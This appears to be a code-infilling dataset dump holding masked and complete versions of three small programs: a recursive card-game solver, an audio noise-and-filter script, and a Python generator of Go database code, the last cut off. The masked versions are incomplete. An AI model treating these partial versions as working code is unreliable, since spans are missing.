"step-3": "def parse(filename):\n t1, t2 = open(filename).read().strip().split('\\n\\n')\n return tuple(map(lambda x: list(map(int, x.split('\\n')[1:])), [t1, t2]))\n\n\ndef score(deck):\n res = 0\n for i in range(len(deck)):\n res += deck[i] * (len(deck) - i)\n return res\n\n\n<mask token>\n\n\ndef can_recurse(deck1, deck2):\n p1, p2 = deck1[0], deck2[0]\n return p1 <= len(deck1) - 1 and p2 <= len(deck2) - 1\n\n\ndef combat(deck1, deck2):\n db = set()\n while len(deck1) > 0 and len(deck2) > 0:\n key = tuple(deck1), tuple(deck2)\n if key in db:\n return 'p1', score(deck1)\n db.add(key)\n p1, p2 = deck1[0], deck2[0]\n if can_recurse(deck1, deck2):\n winner, _ = combat(deck1[1:p1 + 1], deck2[1:p2 + 1])\n else:\n winner = 'p1' if p1 > p2 else 'p2'\n if winner == 'p1':\n deck1 = deck1[1:] + [p1, p2]\n deck2 = deck2[1:]\n else:\n deck1 = deck1[1:]\n deck2 = deck2[1:] + [p2, p1]\n if len(deck1) > 0:\n return 'p1', score(deck1)\n return 'p2', score(deck2)\n\n\ndef solution2(deck1, deck2):\n return combat(deck1, deck2)[1]\n\n\ndef main():\n print(solution1(*parse('sample.txt')))\n print(solution1(*parse('input.txt')))\n print(solution2(*parse('sample.txt')))\n print(solution2(*parse('input.txt')))\n\n\n<mask token>\n",
"step-4": "def parse(filename):\n t1, t2 = open(filename).read().strip().split('\\n\\n')\n return tuple(map(lambda x: list(map(int, x.split('\\n')[1:])), [t1, t2]))\n\n\ndef score(deck):\n res = 0\n for i in range(len(deck)):\n res += deck[i] * (len(deck) - i)\n return res\n\n\ndef solution1(deck1, deck2):\n while len(deck1) > 0 and len(deck2) > 0:\n p1, p2 = deck1[0], deck2[0]\n if p1 > p2:\n deck1 = deck1[1:] + [p1, p2]\n deck2 = deck2[1:]\n else:\n deck1 = deck1[1:]\n deck2 = deck2[1:] + [p2, p1]\n if len(deck1) > 0:\n return score(deck1)\n return score(deck2)\n\n\ndef can_recurse(deck1, deck2):\n p1, p2 = deck1[0], deck2[0]\n return p1 <= len(deck1) - 1 and p2 <= len(deck2) - 1\n\n\ndef combat(deck1, deck2):\n db = set()\n while len(deck1) > 0 and len(deck2) > 0:\n key = tuple(deck1), tuple(deck2)\n if key in db:\n return 'p1', score(deck1)\n db.add(key)\n p1, p2 = deck1[0], deck2[0]\n if can_recurse(deck1, deck2):\n winner, _ = combat(deck1[1:p1 + 1], deck2[1:p2 + 1])\n else:\n winner = 'p1' if p1 > p2 else 'p2'\n if winner == 'p1':\n deck1 = deck1[1:] + [p1, p2]\n deck2 = deck2[1:]\n else:\n deck1 = deck1[1:]\n deck2 = deck2[1:] + [p2, p1]\n if len(deck1) > 0:\n return 'p1', score(deck1)\n return 'p2', score(deck2)\n\n\ndef solution2(deck1, deck2):\n return combat(deck1, deck2)[1]\n\n\ndef main():\n print(solution1(*parse('sample.txt')))\n print(solution1(*parse('input.txt')))\n print(solution2(*parse('sample.txt')))\n print(solution2(*parse('input.txt')))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "def parse(filename):\n\tt1, t2 = open(filename).read().strip().split(\"\\n\\n\")\n\treturn tuple(map(lambda x: list(map(int, x.split(\"\\n\")[1:])), [t1, t2]))\n\ndef score(deck):\n\tres = 0\n\tfor i in range(len(deck)):\n\t\tres += deck[i] * (len(deck)-i)\n\treturn res\n\ndef solution1(deck1, deck2):\n\twhile len(deck1) > 0 and len(deck2) > 0:\n\t\tp1, p2 = deck1[0], deck2[0]\n\t\tif p1 > p2:\n\t\t\tdeck1 = deck1[1:] + [p1, p2]\n\t\t\tdeck2 = deck2[1:]\n\t\telse:\n\t\t\tdeck1 = deck1[1:]\n\t\t\tdeck2 = deck2[1:] + [p2, p1]\n\tif len(deck1) > 0:\n\t\treturn score(deck1)\n\treturn score(deck2)\n\ndef can_recurse(deck1, deck2):\n\tp1, p2 = deck1[0], deck2[0]\n\treturn p1 <= len(deck1) - 1 and p2 <= len(deck2) - 1\n\ndef combat(deck1, deck2):\n\tdb = set()\n\twhile len(deck1) > 0 and len(deck2) > 0:\n\t\tkey = (tuple(deck1), tuple(deck2))\n\t\tif key in db:\n\t\t\treturn \"p1\", score(deck1)\n\t\tdb.add(key)\n\n\t\tp1, p2 = deck1[0], deck2[0]\n\n\t\tif can_recurse(deck1, deck2):\n\t\t\twinner, _ = combat(deck1[1:p1+1], deck2[1:p2+1])\n\t\telse:\n\t\t\twinner = \"p1\" if p1 > p2 else \"p2\"\n\n\t\tif winner == \"p1\":\n\t\t\tdeck1 = deck1[1:] + [p1, p2]\n\t\t\tdeck2 = deck2[1:]\n\t\telse:\n\t\t\tdeck1 = deck1[1:]\n\t\t\tdeck2 = deck2[1:] + [p2, p1]\n\n\tif len(deck1) > 0:\n\t\treturn \"p1\", score(deck1)\n\treturn \"p2\", score(deck2)\n\ndef solution2(deck1, deck2):\n\treturn combat(deck1, deck2)[1]\n\ndef main():\n\tprint(solution1(*parse(\"sample.txt\")))\n\tprint(solution1(*parse(\"input.txt\")))\n\n\tprint(solution2(*parse(\"sample.txt\")))\n\tprint(solution2(*parse(\"input.txt\")))\n\nif __name__ == \"__main__\":\n\tmain()\n",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
<|reserved_special_token_0|>
def Plot_Audio(audio):
s = audio.shape[0]
time = np.arange(s)
plt.plot(time, audio)
plt.show()
def Add_Noise(audio, mu=0, sigma=1):
"""
Adding Gaussian Noise
"""
gaussian_noise = np.random.normal(0, 1, audio.shape[0])
audio = audio + gaussian_noise
return audio
def Median_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.median(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
def Mean_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.mean(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
write('Audio_Modified.wav', rate, audio)
print(audio.shape[0])
print(audio.shape[0] / rate)
def Plot_Audio(audio):
s = audio.shape[0]
time = np.arange(s)
plt.plot(time, audio)
plt.show()
def Add_Noise(audio, mu=0, sigma=1):
"""
Adding Gaussian Noise
"""
gaussian_noise = np.random.normal(0, 1, audio.shape[0])
audio = audio + gaussian_noise
return audio
def Median_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.median(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
def Mean_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.mean(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
Plot_Audio(audio)
<|reserved_special_token_0|>
Plot_Audio(audio)
write('Audio_with_Noise.wav', rate, audio)
<|reserved_special_token_0|>
Plot_Audio(audio_new_mean)
write('Audio_with_Noise_Filtered_Mean.wav', rate, audio_new_mean)
<|reserved_special_token_0|>
Plot_Audio(audio_new_median)
write('Audio_with_Noise_Filtered_Median.wav', rate, audio_new_median)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
rate, audio_original = read('Audio_Original.wav')
audio = audio_original[:, 0]
write('Audio_Modified.wav', rate, audio)
print(audio.shape[0])
print(audio.shape[0] / rate)
def Plot_Audio(audio):
s = audio.shape[0]
time = np.arange(s)
plt.plot(time, audio)
plt.show()
def Add_Noise(audio, mu=0, sigma=1):
"""
Adding Gaussian Noise
"""
gaussian_noise = np.random.normal(0, 1, audio.shape[0])
audio = audio + gaussian_noise
return audio
def Median_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.median(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
def Mean_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.mean(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
Plot_Audio(audio)
audio = Add_Noise(audio)
Plot_Audio(audio)
write('Audio_with_Noise.wav', rate, audio)
audio_new_mean, time_new = Mean_Filter(audio, 2)
Plot_Audio(audio_new_mean)
write('Audio_with_Noise_Filtered_Mean.wav', rate, audio_new_mean)
audio_new_median, time_new = Median_Filter(audio, 2)
Plot_Audio(audio_new_median)
write('Audio_with_Noise_Filtered_Median.wav', rate, audio_new_median)
<|reserved_special_token_1|>
import numpy as np
import scipy
import matplotlib.pyplot as plt
from scipy.io.wavfile import read
from scipy.io.wavfile import write
rate, audio_original = read('Audio_Original.wav')
audio = audio_original[:, 0]
write('Audio_Modified.wav', rate, audio)
print(audio.shape[0])
print(audio.shape[0] / rate)
def Plot_Audio(audio):
s = audio.shape[0]
time = np.arange(s)
plt.plot(time, audio)
plt.show()
def Add_Noise(audio, mu=0, sigma=1):
"""
Adding Gaussian Noise
"""
gaussian_noise = np.random.normal(0, 1, audio.shape[0])
audio = audio + gaussian_noise
return audio
def Median_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.median(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
def Mean_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.mean(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
Plot_Audio(audio)
audio = Add_Noise(audio)
Plot_Audio(audio)
write('Audio_with_Noise.wav', rate, audio)
audio_new_mean, time_new = Mean_Filter(audio, 2)
Plot_Audio(audio_new_mean)
write('Audio_with_Noise_Filtered_Mean.wav', rate, audio_new_mean)
audio_new_median, time_new = Median_Filter(audio, 2)
Plot_Audio(audio_new_median)
write('Audio_with_Noise_Filtered_Median.wav', rate, audio_new_median)
<|reserved_special_token_1|>
# We will try to implement add noise to audio file and filter it using Mean and Median Filters.
import numpy as np
import scipy
import matplotlib.pyplot as plt
from scipy.io.wavfile import read
from scipy.io.wavfile import write
rate,audio_original = read('Audio_Original.wav')
audio = audio_original[:,0]
write("Audio_Modified.wav",rate,audio)
print (audio.shape[0])
print (audio.shape[0]/rate) # Time of track
# print (audio.shape[1]) # No.of Channels
def Plot_Audio(audio): # Function to plot Audio Signal
s = audio.shape[0]
time = np.arange(s)
plt.plot(time,audio)
plt.show()
def Add_Noise(audio,mu = 0,sigma = 1): # Function to add Noise
"""
Adding Gaussian Noise
"""
gaussian_noise = np.random.normal(0, 1, audio.shape[0])
audio = audio + gaussian_noise
return audio
def Median_Filter(audio,M): # Function to apply Median Filter to audio signal
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p,q,s = M,audio.shape[0]- M,audio.shape[0]
audio_change = np.zeros(s+2*M)
audio_change[M:s+M] = audio
audio_new = np.zeros(s)
for i in range(M,s+M):
audio_new[i-M] = np.median(audio_change[i-M:i+M])
time = np.arange(s)
return audio_new,time
def Mean_Filter(audio,M): # Function to apply Mean Filter to audio signal
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p,q,s = M,audio.shape[0]- M,audio.shape[0]
audio_change = np.zeros(s+2*M)
audio_change[M:s+M] = audio
audio_new = np.zeros(s)
for i in range(M,s+M):
audio_new[i-M] = np.mean(audio_change[i-M:i+M])
time = np.arange(s)
return audio_new,time
Plot_Audio(audio)
audio = Add_Noise(audio)
Plot_Audio(audio)
write("Audio_with_Noise.wav",rate,audio) # Creating a Audio signal with noise
audio_new_mean,time_new = Mean_Filter(audio,2)
Plot_Audio(audio_new_mean)
write("Audio_with_Noise_Filtered_Mean.wav",rate,audio_new_mean) # Creating filtered audio signal using Mean Filter
audio_new_median,time_new = Median_Filter(audio,2)
Plot_Audio(audio_new_median)
write("Audio_with_Noise_Filtered_Median.wav",rate,audio_new_median) # Creating filtered audio signal using Median Filter
|
flexible
|
{
"blob_id": "844b8e2d4f05a51282b356c995f2733d6935a5d6",
"index": 5552,
"step-1": "<mask token>\n\n\ndef Plot_Audio(audio):\n s = audio.shape[0]\n time = np.arange(s)\n plt.plot(time, audio)\n plt.show()\n\n\ndef Add_Noise(audio, mu=0, sigma=1):\n \"\"\"\n\tAdding Gaussian Noise\n\t\"\"\"\n gaussian_noise = np.random.normal(0, 1, audio.shape[0])\n audio = audio + gaussian_noise\n return audio\n\n\ndef Median_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.median(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\ndef Mean_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.mean(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\n<mask token>\n",
"step-2": "<mask token>\nwrite('Audio_Modified.wav', rate, audio)\nprint(audio.shape[0])\nprint(audio.shape[0] / rate)\n\n\ndef Plot_Audio(audio):\n s = audio.shape[0]\n time = np.arange(s)\n plt.plot(time, audio)\n plt.show()\n\n\ndef Add_Noise(audio, mu=0, sigma=1):\n \"\"\"\n\tAdding Gaussian Noise\n\t\"\"\"\n gaussian_noise = np.random.normal(0, 1, audio.shape[0])\n audio = audio + gaussian_noise\n return audio\n\n\ndef Median_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.median(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\ndef Mean_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.mean(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\nPlot_Audio(audio)\n<mask token>\nPlot_Audio(audio)\nwrite('Audio_with_Noise.wav', rate, audio)\n<mask token>\nPlot_Audio(audio_new_mean)\nwrite('Audio_with_Noise_Filtered_Mean.wav', rate, audio_new_mean)\n<mask token>\nPlot_Audio(audio_new_median)\nwrite('Audio_with_Noise_Filtered_Median.wav', rate, audio_new_median)\n",
"step-3": "<mask token>\nrate, audio_original = read('Audio_Original.wav')\naudio = audio_original[:, 0]\nwrite('Audio_Modified.wav', rate, audio)\nprint(audio.shape[0])\nprint(audio.shape[0] / rate)\n\n\ndef Plot_Audio(audio):\n s = audio.shape[0]\n time = np.arange(s)\n plt.plot(time, audio)\n plt.show()\n\n\ndef Add_Noise(audio, mu=0, sigma=1):\n \"\"\"\n\tAdding Gaussian Noise\n\t\"\"\"\n gaussian_noise = np.random.normal(0, 1, audio.shape[0])\n audio = audio + gaussian_noise\n return audio\n\n\ndef Median_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.median(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\ndef Mean_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.mean(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\nPlot_Audio(audio)\naudio = Add_Noise(audio)\nPlot_Audio(audio)\nwrite('Audio_with_Noise.wav', rate, audio)\naudio_new_mean, time_new = Mean_Filter(audio, 2)\nPlot_Audio(audio_new_mean)\nwrite('Audio_with_Noise_Filtered_Mean.wav', rate, audio_new_mean)\naudio_new_median, time_new = Median_Filter(audio, 2)\nPlot_Audio(audio_new_median)\nwrite('Audio_with_Noise_Filtered_Median.wav', rate, audio_new_median)\n",
"step-4": "import numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nfrom scipy.io.wavfile import read\nfrom scipy.io.wavfile import write\nrate, audio_original = read('Audio_Original.wav')\naudio = audio_original[:, 0]\nwrite('Audio_Modified.wav', rate, audio)\nprint(audio.shape[0])\nprint(audio.shape[0] / rate)\n\n\ndef Plot_Audio(audio):\n s = audio.shape[0]\n time = np.arange(s)\n plt.plot(time, audio)\n plt.show()\n\n\ndef Add_Noise(audio, mu=0, sigma=1):\n \"\"\"\n\tAdding Gaussian Noise\n\t\"\"\"\n gaussian_noise = np.random.normal(0, 1, audio.shape[0])\n audio = audio + gaussian_noise\n return audio\n\n\ndef Median_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.median(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\ndef Mean_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.mean(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\nPlot_Audio(audio)\naudio = Add_Noise(audio)\nPlot_Audio(audio)\nwrite('Audio_with_Noise.wav', rate, audio)\naudio_new_mean, time_new = Mean_Filter(audio, 2)\nPlot_Audio(audio_new_mean)\nwrite('Audio_with_Noise_Filtered_Mean.wav', rate, audio_new_mean)\naudio_new_median, time_new = Median_Filter(audio, 2)\nPlot_Audio(audio_new_median)\nwrite('Audio_with_Noise_Filtered_Median.wav', rate, audio_new_median)\n",
"step-5": "# We will try to implement add noise to audio file and filter it using Mean and Median Filters.\n\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nfrom scipy.io.wavfile import read\nfrom scipy.io.wavfile import write\n\n\nrate,audio_original = read('Audio_Original.wav')\naudio = audio_original[:,0]\nwrite(\"Audio_Modified.wav\",rate,audio)\nprint (audio.shape[0])\nprint (audio.shape[0]/rate)\t\t\t\t\t\t\t\t\t\t\t\t# Time of track\n# print (audio.shape[1])\t\t\t\t\t\t\t\t\t\t\t\t# No.of Channels\n\ndef Plot_Audio(audio):\t\t\t\t\t\t\t\t\t\t\t\t\t# Function to plot Audio Signal\n\ts = audio.shape[0]\n\ttime = np.arange(s)\n\tplt.plot(time,audio)\n\tplt.show()\n\ndef Add_Noise(audio,mu = 0,sigma = 1):\t\t\t\t\t\t\t\t\t# Function to add Noise\n\t\"\"\"\n\tAdding Gaussian Noise\n\t\"\"\"\n\tgaussian_noise = np.random.normal(0, 1, audio.shape[0])\n\taudio = audio + gaussian_noise\n\t\n\treturn audio\n\t\ndef Median_Filter(audio,M):\t\t\t\t\t\t\t\t\t\t\t\t# Function to apply Median Filter to audio signal\n\t\"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n\tp,q,s = M,audio.shape[0]- M,audio.shape[0]\n\taudio_change = np.zeros(s+2*M)\n\taudio_change[M:s+M] = audio\n\taudio_new = np.zeros(s)\n\t\t\n\tfor i in range(M,s+M):\n\t\taudio_new[i-M] = np.median(audio_change[i-M:i+M])\n\t\n\ttime = np.arange(s)\t\n\t\n\treturn audio_new,time\n\ndef Mean_Filter(audio,M):\t\t\t\t\t\t\t\t\t\t\t\t# Function to apply Mean Filter to audio signal\n\t\"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n\tp,q,s = M,audio.shape[0]- M,audio.shape[0]\n\taudio_change = np.zeros(s+2*M)\n\taudio_change[M:s+M] = audio\n\taudio_new = np.zeros(s)\n\t\t\n\tfor i in range(M,s+M):\n\t\taudio_new[i-M] = np.mean(audio_change[i-M:i+M])\n\t\n\ttime = np.arange(s)\t\n\t\n\treturn audio_new,time\n\nPlot_Audio(audio)\naudio = Add_Noise(audio)\nPlot_Audio(audio)\nwrite(\"Audio_with_Noise.wav\",rate,audio)\t\t\t\t\t\t\t\t# Creating a Audio signal with noise\n\n\naudio_new_mean,time_new = Mean_Filter(audio,2)\nPlot_Audio(audio_new_mean)\nwrite(\"Audio_with_Noise_Filtered_Mean.wav\",rate,audio_new_mean)\t\t\t# Creating filtered audio signal using Mean Filter\n\t\t\naudio_new_median,time_new = Median_Filter(audio,2)\nPlot_Audio(audio_new_median)\nwrite(\"Audio_with_Noise_Filtered_Median.wav\",rate,audio_new_median)\t\t# Creating filtered audio signal using Median Filter\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
go.write('package main\n\n')
go.write('import (\n ')
go.write(""""github.com/jmoiron/sqlx"
)
""")
go.write('type {0} struct {1}\n'.format(dictiony['dbname'], '{'))
go.write(' ID {}\n'.format(dictiony['uuid']))
go.write(' Name {}\n'.format(dictiony['varchar']))
go.write(' PhoneNumber {}\n'.format(dictiony['varchar']))
go.write(' Address {}\n'.format(dictiony['varchar']))
go.write(' Description {}\n'.format(dictiony['varchar']))
go.write('}\n\n')
go.write('type {0}Repo struct {1}\n'.format(dictiony['dbname'], '{'))
go.write(""" db *sqlx.DB
}
""")
go.write('type {0}I interface {1}\n'.format(dictiony['dbname'], '{'))
go.write(""" Create(*{0}) (string, error)
{1}
""".format(dictiony[
'dbname'], '}'))
go.write('func New{0}(db *sqlx.DB) {1} {2}\n'.format(dictiony['dbname'],
dictiony['interface'], '{'))
go.write(' return &{0}Repo{1}\n'.format(dictiony['dbname'], '{'))
go.write(""" db: db,
{0}
{1}
""".format('}', '}'))
go.write('func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\n'.
format(dictiony['dbname'], '{', dictiony['dbname']))
go.write(' query := `INSERT INTO {} (\n'.format(dictiony['dbname']))
go.write(
""" id,
name,
phonenumber,
address,
""")
go.write(""" description)
values($1, $2, $3, $4, $5);`
""")
go.write(' prp, err := ica.db.Prepare(query)\n\n ')
go.write(' if err != nil ')
go.write('{\n')
go.write(' return "", err\n')
go.write(' }\n')
go.write(' _, err = prp.Exec(\n')
go.write(""" agent.ID,
agent.Name,
""")
go.write(
""" agent.PhoneNumber,
agent.Address,
agent.Description,
)
"""
)
go.write(' if err != nil {\n ')
go.write("""return "", err
}
""")
go.write(""" return agent.ID, err
}""")
<|reserved_special_token_1|>
<|reserved_special_token_0|>
f = open('parse.sql')
go = open('struct.go', 'w+')
dictiony = {'uuid': 'string', 'varchar': 'string', 'timestamp': 'time.Time',
'int': 'int', 'text': 'string', 'dbname': 'IndividualContrAgent',
'interface': 'IndividualContrAgentI', 'ica': 'ica'}
go.write('package main\n\n')
go.write('import (\n ')
go.write(""""github.com/jmoiron/sqlx"
)
""")
go.write('type {0} struct {1}\n'.format(dictiony['dbname'], '{'))
go.write(' ID {}\n'.format(dictiony['uuid']))
go.write(' Name {}\n'.format(dictiony['varchar']))
go.write(' PhoneNumber {}\n'.format(dictiony['varchar']))
go.write(' Address {}\n'.format(dictiony['varchar']))
go.write(' Description {}\n'.format(dictiony['varchar']))
go.write('}\n\n')
go.write('type {0}Repo struct {1}\n'.format(dictiony['dbname'], '{'))
go.write(""" db *sqlx.DB
}
""")
go.write('type {0}I interface {1}\n'.format(dictiony['dbname'], '{'))
go.write(""" Create(*{0}) (string, error)
{1}
""".format(dictiony[
'dbname'], '}'))
go.write('func New{0}(db *sqlx.DB) {1} {2}\n'.format(dictiony['dbname'],
dictiony['interface'], '{'))
go.write(' return &{0}Repo{1}\n'.format(dictiony['dbname'], '{'))
go.write(""" db: db,
{0}
{1}
""".format('}', '}'))
go.write('func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\n'.
format(dictiony['dbname'], '{', dictiony['dbname']))
go.write(' query := `INSERT INTO {} (\n'.format(dictiony['dbname']))
go.write(
""" id,
name,
phonenumber,
address,
""")
go.write(""" description)
values($1, $2, $3, $4, $5);`
""")
go.write(' prp, err := ica.db.Prepare(query)\n\n ')
go.write(' if err != nil ')
go.write('{\n')
go.write(' return "", err\n')
go.write(' }\n')
go.write(' _, err = prp.Exec(\n')
go.write(""" agent.ID,
agent.Name,
""")
go.write(
""" agent.PhoneNumber,
agent.Address,
agent.Description,
)
"""
)
go.write(' if err != nil {\n ')
go.write("""return "", err
}
""")
go.write(""" return agent.ID, err
}""")
<|reserved_special_token_1|>
import sqlparse
f = open('parse.sql')
go = open('struct.go', 'w+')
dictiony = {'uuid': 'string', 'varchar': 'string', 'timestamp': 'time.Time',
'int': 'int', 'text': 'string', 'dbname': 'IndividualContrAgent',
'interface': 'IndividualContrAgentI', 'ica': 'ica'}
go.write('package main\n\n')
go.write('import (\n ')
go.write(""""github.com/jmoiron/sqlx"
)
""")
go.write('type {0} struct {1}\n'.format(dictiony['dbname'], '{'))
go.write(' ID {}\n'.format(dictiony['uuid']))
go.write(' Name {}\n'.format(dictiony['varchar']))
go.write(' PhoneNumber {}\n'.format(dictiony['varchar']))
go.write(' Address {}\n'.format(dictiony['varchar']))
go.write(' Description {}\n'.format(dictiony['varchar']))
go.write('}\n\n')
go.write('type {0}Repo struct {1}\n'.format(dictiony['dbname'], '{'))
go.write(""" db *sqlx.DB
}
""")
go.write('type {0}I interface {1}\n'.format(dictiony['dbname'], '{'))
go.write(""" Create(*{0}) (string, error)
{1}
""".format(dictiony[
'dbname'], '}'))
go.write('func New{0}(db *sqlx.DB) {1} {2}\n'.format(dictiony['dbname'],
dictiony['interface'], '{'))
go.write(' return &{0}Repo{1}\n'.format(dictiony['dbname'], '{'))
go.write(""" db: db,
{0}
{1}
""".format('}', '}'))
go.write('func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\n'.
format(dictiony['dbname'], '{', dictiony['dbname']))
go.write(' query := `INSERT INTO {} (\n'.format(dictiony['dbname']))
go.write(
""" id,
name,
phonenumber,
address,
""")
go.write(""" description)
values($1, $2, $3, $4, $5);`
""")
go.write(' prp, err := ica.db.Prepare(query)\n\n ')
go.write(' if err != nil ')
go.write('{\n')
go.write(' return "", err\n')
go.write(' }\n')
go.write(' _, err = prp.Exec(\n')
go.write(""" agent.ID,
agent.Name,
""")
go.write(
""" agent.PhoneNumber,
agent.Address,
agent.Description,
)
"""
)
go.write(' if err != nil {\n ')
go.write("""return "", err
}
""")
go.write(""" return agent.ID, err
}""")
<|reserved_special_token_1|>
import sqlparse
f = open("parse.sql")
go = open("struct.go", "w+")
dictiony = {
"uuid": "string",
"varchar": "string",
"timestamp": "time.Time",
"int": "int",
"text": "string",
"dbname": "IndividualContrAgent",
"interface": "IndividualContrAgentI",
"ica":"ica"
}
#package
go.write("package main\n\n")
#import
go.write("import (\n ")
go.write('"github.com/jmoiron/sqlx"\n)\n\n')
#struct
go.write("type {0} struct {1}\n".format(dictiony["dbname"], "{"))
go.write(" ID {}\n".format(dictiony["uuid"]))
go.write(" Name {}\n".format(dictiony["varchar"]))
go.write(" PhoneNumber {}\n".format(dictiony["varchar"]))
go.write(" Address {}\n".format(dictiony["varchar"]))
go.write(" Description {}\n".format(dictiony["varchar"]))
